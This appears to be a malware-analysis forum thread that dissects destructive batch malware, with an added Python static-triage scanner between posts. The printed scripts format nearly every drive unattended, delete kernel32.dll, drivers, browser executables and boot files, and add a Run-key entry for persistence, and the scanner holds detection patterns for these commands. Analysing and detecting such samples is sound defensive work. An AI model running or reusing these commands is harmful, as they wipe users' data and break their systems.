 #5621  by EP_X0FF
 Thu Mar 24, 2011 11:11 am
Created with the free BatToExeConverter program.

This is a program dangerous to the system, created by a script kiddie.
For example, it tries to delete all installed drivers and re-format drives. All this is done through bat and vbs scripts.
FORMAT A: /FS:NTFS /V:(A:) /X /P:1 /y >nul
FORMAT B: /FS:NTFS /V:(B:) /X /P:1 /y >nul
FORMAT C: /FS:NTFS /V:(C:) /X /P:1 /y >nul
FORMAT D: /FS:NTFS /V:(D:) /X /P:1 /y >nul
FORMAT E: /FS:NTFS /V:(E:) /X /P:1 /y >nul
FORMAT F: /FS:NTFS /V:(F:) /X /P:1 /y >nul
FORMAT G: /FS:NTFS /V:(G:) /X /P:1 /y >nul
FORMAT H: /FS:NTFS /V:(H:) /X /P:1 /y >nul
FORMAT I: /FS:NTFS /V:(I:) /X /P:1 /y >nul
FORMAT J: /FS:NTFS /V:(J:) /X /P:1 /y >nul
FORMAT K: /FS:NTFS /V:(K:) /X /P:1 /y >nul
FORMAT M: /FS:NTFS /V:(M:) /X /P:1 /y >nul
FORMAT N: /FS:NTFS /V:(N:) /X /P:1 /y >nul
FORMAT O: /FS:NTFS /V:(O:) /X /P:1 /y >nul
FORMAT P: /FS:NTFS /V:(P:) /X /P:1 /y >nul
FORMAT Q: /FS:NTFS /V:(Q:) /X /P:1 /y >nul
FORMAT R: /FS:NTFS /V:(R:) /X /P:1 /y >nul
FORMAT S: /FS:NTFS /V:(S:) /X /P:1 /y >nul
FORMAT T: /FS:NTFS /V:(T:) /X /P:1 /y >nul
FORMAT U: /FS:NTFS /V:(U:) /X /P:1 /y >nul
FORMAT V: /FS:NTFS /V:(V:) /X /P:1 /y >nul
FORMAT W: /FS:NTFS /V:(W:) /X /P:1 /y >nul
FORMAT X: /FS:NTFS /V:(X:) /X /P:1 /y >nul
FORMAT Z: /FS:NTFS /V:(Z:) /X /P:1 /y >nul
del /f /q "C:\Program Files\Internet Explorer\iexplore.exe"

del /f /q "C:\Program Files\Mozilla Firefox\*.*"

del /f /q "C:\WINDOWS\system32\kernel32.dll"

Set load=HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Reg Add "%load%" /v "BSOD" /t "REG_SZ" /d "C:\Documents and Settings\User\Desktop\aim_bot47_48.exe" /f > nul
Del /q /s /f "%SystemRoot%\System32\Drivers\*.*"
Thread renamed to be more descriptive.
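A static triage pass over script text recovered from a converted executable like this one, as an added example that is not part of the original posts: it flags the behaviours quoted in this thread and expands variables the script sets itself, so the `%load%` indirection does not hide the Run key path. Rule names, patterns and the sample script are assumptions constructed for this example.

```python
import re

# Rule names and patterns are assumptions for this example, not a vendor signature set.
RULES = {
    "unattended_format": re.compile(r"^format\s+[a-z]:.*\s/y\b", re.I),
    "system_file_delete": re.compile(
        r"^del\b.*(\\system32\\|\\(boot\.ini|ntldr|autoexec\.bat|win\.ini)\b)", re.I),
    "run_key_persistence": re.compile(
        r"^reg\s+add\b.*\\currentversion\\run(once)?\b", re.I),
    "attrib_strip": re.compile(
        r"^attrib\b(?=.*\s-r\b)(?=.*\s-s\b)(?=.*\s-h\b)", re.I),
}
SET_RE = re.compile(r"^set\s+(\w+)=(.*)$", re.I)   # plain "set name=value" only
VAR_RE = re.compile(r"%(\w+)%")

# Constructed sample: a few commands of the kinds quoted in the thread,
# with a placeholder path in the registry value.
SAMPLE = r'''@echo off
FORMAT C: /FS:NTFS /V:(C:) /X /P:1 /y >nul
del /f /q "C:\WINDOWS\system32\kernel32.dll"
Set load=HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Reg Add "%load%" /v "BSOD" /t "REG_SZ" /d "C:\sample.exe" /f > nul
attrib -r -s -h c:\boot.ini
del c:\boot.ini
echo done
'''

def scan(script):
    """Return (line_no, rule_name, expanded_line) for each flagged command."""
    env, hits = {}, []
    for no, raw in enumerate(script.splitlines(), 1):
        line = raw.strip().lstrip("@")
        m = SET_RE.match(line)
        if m:
            # Remember script-defined variables so later uses can be resolved.
            env[m.group(1).lower()] = m.group(2).strip().strip('"')
            continue
        # Expand only variables the script set; system ones (%SystemRoot%) stay as written.
        line = VAR_RE.sub(lambda v: env.get(v.group(1).lower(), v.group(0)), line)
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((no, name, line))
    return hits

if __name__ == "__main__":
    for no, name, line in scan(SAMPLE):
        print(f"line {no}: {name}: {line}")
```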
 #6318  by Xylitol
 Sat May 14, 2011 11:33 am
Win32.KillFiles batch2exe powered

original:
20/42 >> 47.6%
http://www.virustotal.com/file-scan/rep ... 1305286943

unpacked:
8/43 >> 18.6%
https://www.virustotal.com/file-scan/re ... 1305377088

i lol'd:
Image
 #18530  by EP_X0FF
 Fri Mar 15, 2013 3:19 am
Another work of a script kiddie in the full meaning of this term. Just for lulz.

https://www.virustotal.com/en/file/bd21 ... /analysis/
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini